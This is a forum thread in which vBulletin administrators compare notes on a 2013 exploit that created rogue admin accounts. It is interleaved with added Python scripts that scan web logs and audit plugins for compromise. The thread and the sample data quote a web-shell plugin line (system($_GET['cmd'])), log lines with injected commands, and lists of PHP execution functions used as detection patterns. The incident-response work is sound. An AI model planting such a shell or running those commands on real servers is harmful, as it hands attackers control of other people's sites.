Exploit Questions
  • Pingu
    replied
    If you have apache logs (or whatever webserver you run), look for ip addresses accessing install/upgrade.php. That'll give you a clue, I guess



  • HondaATC
    replied
    I don't have any ip address to cross reference with the registration I had happen though unfortunately...



  • Pingu
    replied
    Suffering the same sort of hack. A plugin was added to our vB (ajax_complete), which through ajax.php, provided the hacker access to system commands. I've checked the access_log and nothing happened after a "uname -a". Except that another ip address (both ip addresses belong to Leaseweb Netherlands) has accessed the same ajax.php with the same uname command. No other commands have been run through ajax.php. The error_log shows they were trying to mess with the database though through vb_database_alter, amongst other things.

    vB has been cleaned up, ip addresses have been added to the firewall (for what it's worth).


    Still, check your access and error logs if you suffered the same. Whatever's been done might go further than the vB control panel logs will show.

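    Pingu's two replies above both come down to the same check: read the web server access log for the two things this thread describes, hits on the vBulletin /install/upgrade.php script and hits on ajax.php that carry a cmd= parameter for the injected plugin. The script below is an added example written for this thread, not code from vBulletin or from any poster; it parses Apache combined-format lines and summarises the matching requests per source IP. The log lines are constructed (documentation-range IPs), and the path suffixes it matches are assumptions about a default install layout.

```python
"""
Scan Apache combined-format access log lines for the two indicators described in
this thread: requests to the vBulletin /install/upgrade.php (or install.php) script
and requests to ajax.php carrying a cmd= parameter.
Added example; the SAMPLE_LOG lines are constructed, not from a real server.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Combined log format: ip ident user [time] "METHOD target HTTP/x" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [03/Sep/2013:22:20:01 +0000] "GET /forum/index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.9 - - [03/Sep/2013:22:21:14 +0000] "GET /forum/install/upgrade.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.9 - - [03/Sep/2013:22:21:40 +0000] "POST /forum/install/upgrade.php HTTP/1.1" 200 634 "-" "Mozilla/5.0"
198.51.100.9 - - [03/Sep/2013:22:27:02 +0000] "GET /forum/ajax.php?do=complete&cmd=uname%20-a HTTP/1.1" 200 210 "-" "curl/7.29"
198.51.100.10 - - [03/Sep/2013:22:31:55 +0000] "GET /forum/ajax.php?do=complete&cmd=uname%20-a HTTP/1.1" 200 210 "-" "curl/7.29"
203.0.113.7 - - [03/Sep/2013:22:35:10 +0000] "GET /forum/ajax.php?do=usersearch&q=bob HTTP/1.1" 200 340 "-" "Mozilla/5.0"
"""


def classify(entry):
    """Return the indicator name a parsed entry matches, or None."""
    url = urlsplit(entry["target"])
    path = url.path.lower()
    # Assumed layout: the forum's install scripts live under <root>/install/.
    if path.endswith("/install/upgrade.php") or path.endswith("/install/install.php"):
        return "install-script"
    # ajax.php is legitimate; only a cmd= parameter is suspicious.
    if path.endswith("/ajax.php") and "cmd" in parse_qs(url.query):
        return "ajax-cmd"
    return None


def scan_log(text):
    """Parse log text; return (list of findings, {ip: sorted indicator kinds})."""
    findings = []
    by_ip = defaultdict(set)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format (or a truncated line); skip it
        entry = m.groupdict()
        kind = classify(entry)
        if kind is None:
            continue
        cmd = parse_qs(urlsplit(entry["target"]).query).get("cmd", [None])[0]
        findings.append({"ip": entry["ip"], "time": entry["time"], "kind": kind,
                         "method": entry["method"], "status": entry["status"], "cmd": cmd})
        by_ip[entry["ip"]].add(kind)
    return findings, {ip: sorted(kinds) for ip, kinds in by_ip.items()}


if __name__ == "__main__":
    found, summary = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['time']}  {f['ip']:15}  {f['kind']:14}  {f['method']}  cmd={f['cmd']!r}")
    print("suspect IPs:", summary)
```

    Run it against the real file instead of SAMPLE_LOG (for example by reading /var/log/apache2/access.log) and every decoded cmd value tells you what was actually executed through the plugin, which the AdminCP log cannot show. An IP that appears under both indicators is the one that set the hook up and then used it.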


  • HondaATC
    replied
    Originally posted by Wayne Luke:

    They would need to create a plugin or something to have additional access outside the AdminCP. However once in the AdminCP, that could be possible. You would need to check your plugins to make sure none of them are new or not what you installed.
    My administrative log did not indicate there were any plugins modified/uploaded, and pruning it is locked via the config file. Am I safe to assume nothing else happened then?



  • EvilArcana
    replied
    I was hacked this morning...not sure if it was this exploit or not, but I had an admin user that created a default plugin that was an ajax start that did the following:

    system($_GET['cmd']);

    I've deleted the user...

    He replaced my index.php with some text that said "HACKED...Fix yo s**t" only it wasn't censored...From what I can tell, that's the only damage that was done. Is this the kind of activity you would expect from this exploit? Should I submit a ticket to get someone to look into further damages and issues? It looks like the individual was sending a warning or something for us to tighten up on security or something.

    I mainly want to make sure I got rid of all the back doors he may have put in. The plugin that had the system command in it existed twice.

    There's some other stuff that he did, but I'm not sure how to get the details and what I should look for...here's my admin log:

    http://pastebin.com/FJ8DkhPp



  • Wayne Luke
    replied
    Originally posted by HondaATC:
    Right, I checked there and haven't seen anything, but how deep does this go, were they able to access the database directly, cpanel, etc. etc?
    They would need to create a plugin or something to have additional access outside the AdminCP. However once in the AdminCP, that could be possible. You would need to check your plugins to make sure none of them are new or not what you installed.

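    Wayne Luke's advice to check that no plugin is new or different from what you installed, and EvilArcana's find of a plugin containing system($_GET['cmd']) that existed twice, call for the same triage. The script below is an added example written for this thread, not vBulletin code or a poster's code. It audits plugin rows for PHP that executes commands or code, flags the worst case where request input reaches such a call, and reports identical code installed more than once. The rows are constructed; the column names (pluginid, title, hookname, phpcode, active) are an assumption about the plugin table, and a real audit would read them from the database or the AdminCP Plugin Manager.

```python
"""
Triage vBulletin-style plugin rows for code that executes commands or evaluates code,
as in the system($_GET['cmd']) plugin described in this thread.
Added example, not vBulletin code. SAMPLE_ROWS is constructed; the assumed columns are
pluginid, title, hookname, phpcode and active.
"""
import re
from collections import Counter

# PHP functions that run shell commands or evaluate code; any of these in a plugin deserves a look.
EXEC_FUNCS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open",
              "eval", "assert", "create_function")
EXEC_RE = re.compile(r"\b(" + "|".join(EXEC_FUNCS) + r")\s*\(", re.IGNORECASE)
BACKTICK_RE = re.compile(r"`[^`]*`")                       # PHP backtick operator == shell_exec
REQUEST_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")  # attacker-controlled input
OBFUSC_RE = re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\(", re.IGNORECASE)


def audit_plugin(row):
    """Return a list of (severity, reason) findings for one plugin row."""
    code = row["phpcode"]
    findings = []
    execs = {m.group(1).lower() for m in EXEC_RE.finditer(code)}
    uses_request = bool(REQUEST_RE.search(code))
    if execs and uses_request:
        findings.append(("critical", f"request input reaches {', '.join(sorted(execs))}()"))
    elif execs:
        findings.append(("high", f"calls {', '.join(sorted(execs))}()"))
    if BACKTICK_RE.search(code):
        findings.append(("critical" if uses_request else "high", "backtick shell execution"))
    if OBFUSC_RE.search(code):
        findings.append(("medium", "decodes/inflates an embedded payload"))
    return findings


def _normalised(code):
    """Strip whitespace so two copies of the same plugin compare equal."""
    return re.sub(r"\s+", "", code)


def audit_plugins(rows):
    """Audit every row; also flag identical code installed more than once."""
    report = {}
    dup_counts = Counter(_normalised(r["phpcode"]) for r in rows)
    for row in rows:
        findings = audit_plugin(row)
        if dup_counts[_normalised(row["phpcode"])] > 1:
            findings.append(("info", "identical code installed more than once"))
        if findings:
            report[row["pluginid"]] = {"title": row["title"], "hook": row["hookname"],
                                       "active": bool(row["active"]), "findings": findings}
    return report


# Constructed rows; titles and hook names are illustrative, not from any real board.
SAMPLE_ROWS = [
    {"pluginid": 1, "title": "Thread stats",  "hookname": "showthread_start", "active": 1,
     "phpcode": "$stats = fetch_stats($threadinfo['threadid']);"},
    {"pluginid": 2, "title": "ajax_complete", "hookname": "ajax_start", "active": 1,
     "phpcode": "system($_GET['cmd']);"},
    {"pluginid": 3, "title": "ajax_complete", "hookname": "ajax_start", "active": 0,
     "phpcode": "system( $_GET['cmd'] );"},
    {"pluginid": 4, "title": "Cache warmer",  "hookname": "global_start", "active": 1,
     "phpcode": "$out = shell_exec('/usr/bin/php ' . DIR . '/cron.php');"},
    {"pluginid": 5, "title": "Loader",        "hookname": "init_startup", "active": 1,
     "phpcode": "eval(base64_decode($blob));"},
]

if __name__ == "__main__":
    for pid, info in sorted(audit_plugins(SAMPLE_ROWS).items()):
        flags = "; ".join(f"{sev}: {why}" for sev, why in info["findings"])
        print(f"plugin {pid} '{info['title']}' @ {info['hook']} active={info['active']}: {flags}")
```

    Note that an inactive copy (plugin 3 above) is still reported: disabling a plugin in the AdminCP leaves its code in the table, so a second, switched-off copy is exactly the kind of leftover back door EvilArcana was worried about. The "high" findings are not proof of compromise, since some legitimate add-ons shell out, but each one should be matched against what you knowingly installed.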


  • contemptx
    replied
    Several of my forums were affected by this exploit, however only one of the forums had activity from the hacked user which was them grabbing the email list.

    44237 support 22:27, 3rd Sep 2013 email.php makelist 99.227.104.35
    44236 support 22:27, 3rd Sep 2013 email.php genlist 99.227.104.35



  • jscherbel
    replied
    I had the same things and did the same steps (removing /install and deleting the three new administrator accounts). Interested to know from the greater community whether anyone has found that anything else was done with these user accounts.



  • HondaATC
    replied
    Right, I checked there and haven't seen anything, but how deep does this go, were they able to access the database directly, cpanel, etc. etc?



  • Lynne
    replied
    You can see what they were doing by looking in your Statistics & Logs > Control Panel Logs.



  • HondaATC
    started a topic [CMS] Exploit Questions

    Exploit Questions

    Received the email notice this morning, logged into my forum, just HAPPENED by sheer luck to see a new registered member "Th3H4ck" and seen they had administrative powers. So I immediately deleted their account, and removed the /install directory on my forum as indicated. The site is not defaced and otherwise appears to be OK.

    HOWEVER, I am reading about other members having admin log entries changed and such, how can I verify nothing was changed in the database or put elsewhere? I ran the admincp log and didn't see anything out of normal running back the past several days.

    Please advise.